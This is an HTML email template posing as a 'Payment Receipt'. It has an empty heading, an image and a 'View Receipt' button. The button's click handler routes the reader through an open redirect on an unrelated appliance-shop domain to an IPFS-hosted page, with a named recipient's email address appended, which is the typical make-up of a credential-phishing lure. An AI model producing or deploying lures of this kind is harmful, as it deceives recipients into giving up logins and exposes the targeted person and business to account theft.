<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Payment Receipt</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            font-size: 16px;
            line-height: 1.5;
            margin: 0;
            padding: 0;
        }

        table {
            width: 100%;
            max-width: 600px; /* Set a maximum width to ensure email compatibility */
            margin: auto; /* Center the table horizontally */
        }

        h1 {
            margin-top: 20px;
            margin-bottom: 0;
            text-align: center;
        }

        img {
            max-width: 100%; /* Ensure images don't exceed their container */
            height:auto; /* Allow images to scale proportionally */
            display:block; /* Remove any default image spacing */
            margin-top:20px;
            margin-bottom:20px;
        }

        .button-container{
             text-align:center;
         }

         .button {
             background-color:#007bff;
             border:none;
             color:white;
             padding:10px 20px;
             text-decoration:none;
             display:inline-block;
             margin-top:20px;
         }

         .button:hover {
             background-color:#000000;
         }

         .button:focus{
              outline:none !important;
              cursor:auto !important;
         }
     </style>
</head>

<body>
    <table cellpadding="0" cellspacing="0" border="0">
    	<tr>
        	 <td align="center">
              	<h1> </h1>
         	</td>
     	</tr>

     	<tr>
      		<td align="center">
                <img src="https://i.imgur.com/aZKI5bW.png" alt="" width="1500" height="900">
          </td>
        </tr>
        <tr onclick='location.href="http://indesit.cheapfridgefreezers.co.uk/go.php?url=https://ipfs.io/ipfs/bafybeidvfsx2kqziymdeoq7t5nuzp4nbx2rdx54sfs7aahn6wtrxicsruq/sa.html#sofroniouelectronics@cytanet.com.cy"' style='cursor:;' onmouseover='this.style.backgroundColor="#000";this.style.color="#fff";' onmouseout='this.style.backgroundColor="#007bff";this.style.color="#fff";'>
            <td align='center'>
                <div align="center" style='background-color:#007bff;color:white;padding:10px 20px;text-decoration:none;display:inline-block;'>View Receipt</div>
            </td>
       </tr>

     </table>

</body>
</html>
